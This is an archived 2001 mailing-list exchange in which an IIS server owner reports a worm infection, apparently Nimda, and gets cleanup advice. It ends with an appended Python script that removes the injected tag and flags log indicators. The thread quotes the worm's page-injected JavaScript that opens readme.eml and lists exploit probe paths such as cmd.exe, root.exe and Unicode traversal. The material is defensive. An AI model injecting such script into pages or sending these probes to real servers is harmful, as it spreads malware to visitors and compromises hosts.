The UK Home Automation Archive


RE: IIS Worm


  • To: <ukha_d@xxxxxxx>
  • Subject: RE: IIS Worm
  • From: "Graham Howe" <graham@xxxxxxx>
  • Date: Wed, 19 Sep 2001 01:50:54 +0100
  • Delivered-to: mailing list ukha_d@xxxxxxx
  • Mailing-list: list ukha_d@xxxxxxx; contact ukha_d-owner@xxxxxxx
  • Reply-to: ukha_d@xxxxxxx

See my comments below:

> Hard to say really given the lack of information on it... first thing I
> suggest is close the IIS down if you have not already since you will
> currently be unwittingly attacking neighbouring IP ranges. (You will make
> at least 16 attacks)
>
I have stopped all web sites on the server, do I need to disable the actual
IIS service too? If so then where is the best place to do this (I am not an
NT4 server expert).

> The next stage will be for the moment the hard one. Finding out what was
> done to your system. If it follows Code Red as closely as current
> suggestions are then you will find multiple versions of index.htm(l) and
> default.htm(l) in all web directories and some system directories. These
> files will contain any new "content" and as such should be immediately
> destroyed.
>
It appears to be much worse than this, I have over 4500 files that have been
altered today and they appear to include every page in every site on the
server (even the example stuff included in the initial installation).
Looking at the pages they all have the following added to the end of the
page:

<html><script
language="JavaScript">window.open("readme.eml",
null,
"resizable=no,top=6000,left=6000")</script></html>

which obviously causes problems for those visiting my sites.

> Assuming you have logging turned on for W3SRV then this might not be too
> difficult to track. The log will tell you everything that was done through
> IIS. It will also show you the successful loophole in your system that
> allowed it to happen. (see later)
>
I have not checked the log as I could see all this already.

> A simple and effective although possibly time consuming exercise is to use
> the simple Find Files mechanism of Windows on your entire drive. You should
> be able to get a potential time from the W3SRV log files or at least between
> when you knew you were OK and when you discovered the breach. Any files in
> this timeframe should be examined for potential corruption.
>
As above there are over 4500 of them.

> If you find cmd.exe or similar in the IISSCRIPTS directory, usually after a
> Code Red type attack, but check the whole InetPub tree, delete this file.
>
No sign of this, but I had installed the code red patch so I am not
surprised.

> Use Find files again to search for *.eml. This is what your web server has
> been instructed to download and parse in order to install the worm. If the
> file isn't known to be yours, delete it without opening it or at worst
> archive to floppy and check on another machine not running IIS4/5.
>
Loads of these, all now deleted. However they come back following a reboot
so I obviously still have the worm on my system.

> Do a find *in* files looking for "readme.eml". This is the rogue file your
> server will attempt to distribute. Remove or fix any files containing a
> reference to it.
>
Big problem is the number affected, I don't know of a way to change that
many files.

> Before resuming IIS service in any way, you need to ensure that you are
> secure.
>
Looks like I will be out of action for a while.

> Disable script access to all directories across the board except where
> specifically needed and ensure that the scripts can only access known
> resources as INETUSER. One attempt, although largely unsuccessful, to access
> an IIS machine is using the scripts supplied in the default installation.
>

Please give idiot proof instructions on this, I am not sure of the best way
of sorting out script access and resources.

> Use Windows Update or your preferred mechanism to install all known updates,
> particularly service packs and security updates.
>
I thought I had! Code Red was done but not Code Blue, I am now using
hfnetchk to see that all patches are there, is this best solution?

> Look at:
>
> http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms00-078.asp
>
This one was missing, it is in place now.

> and similar articles.
>
> If you need external access for configuration use IP based access to protect
> against password cracking attempts. If you do not, disable the remote
> administration interface for IIS if it is enabled and remove the default
> installation of files in the INETPUB directory or set IIS to use a non
> standard root which will do effectively the same thing but preserves the
> original files for your reference if you want them.
>
I don't need remote admin, so should I simply stop the admin site within
IIS?

> Ensure authoring permissions etc are set to maximum security and anything
> that seems slightly suspicious is set to use challenge response
> authentication only.
>
I tend to do everything through Frontpage publishing and SQL Server
Enterprise Manager. Both require passwords for access, but I am not sure how
secure they are. Again are there any idiot guides as to what I should set
up?

> The following are known attacks of this virus. After you have installed the
> malformed URL fix, you will be immune to all, however, these items in your
> logs will indicate files you need to search for and where appropriate
> destroy:
>
All these files are not present or else seem fine (old dates)

> get_mem_bin
> vti_bin owssvr.dll
> Root.exe
> CMD.EXE
> ../ (Unicode)
> Getadmin.dll
> Default.IDA
> /Msoffice/ cltreq.asp
>
>
> Also look out for readme.exe and admin.dll (56K) with a 'audio xwave' mime
> type which were the original propagation.
>
These have been removed.


> HTH.
>
It has but more help would still be welcome.

> Mark.
>
Graham
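As an added defender's example (not part of Graham's or Mark's messages), the following Python script does the two bulk jobs the thread struggles with: it strips the appended readme.eml launcher tag from every page under a web root, and it flags W3SVC log lines that contain the probe strings Mark listed. The script name, the latin-1 file encoding and the treatment of "../" as a literal are assumptions.

```python
import re
import sys
from pathlib import Path

# The tag quoted in the message above, which the worm appended to every page.
# Line breaks inside the quoted copy vary, so the regex tolerates any whitespace.
INJECTED_TAG = re.compile(
    r'<html>\s*<script\s+language="JavaScript">\s*window\.open\("readme\.eml",'
    r'\s*null,\s*"resizable=no,top=6000,left=6000"\)\s*</script>\s*</html>',
    re.IGNORECASE,
)

# Request fragments from Mark's list of known probes, lower-cased for matching.
# Assumption: "../" is matched literally, so URL-encoded traversal is not caught.
LOG_INDICATORS = ("get_mem_bin", "owssvr.dll", "root.exe", "cmd.exe", "../",
                  "getadmin.dll", "default.ida", "cltreq.asp")


def strip_injected_tag(html):
    """Return (cleaned_html, tags_removed) for the text of one page."""
    return INJECTED_TAG.subn("", html)


def clean_tree(root):
    """Rewrite every .htm/.html page under root that carries the tag.

    Returns the number of files changed. Run it against a backup copy first.
    """
    fixed = 0
    for page in Path(root).rglob("*.htm*"):
        text = page.read_text(encoding="latin-1", errors="replace")
        cleaned, hits = strip_injected_tag(text)
        if hits:
            page.write_text(cleaned, encoding="latin-1")
            fixed += 1
    return fixed


def suspicious_log_lines(lines):
    """Return the W3SVC log lines whose request contains a listed probe string."""
    return [line for line in lines
            if any(ind in line.lower() for ind in LOG_INDICATORS)]


if __name__ == "__main__":
    # Usage (hypothetical script name): python iis_worm_cleanup.py <web_root> [w3svc.log]
    print("pages cleaned:", clean_tree(sys.argv[1]))
    if len(sys.argv) > 2:
        with open(sys.argv[2], encoding="latin-1", errors="replace") as fh:
            for hit in suspicious_log_lines(fh):
                print("PROBE:", hit.rstrip())
```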

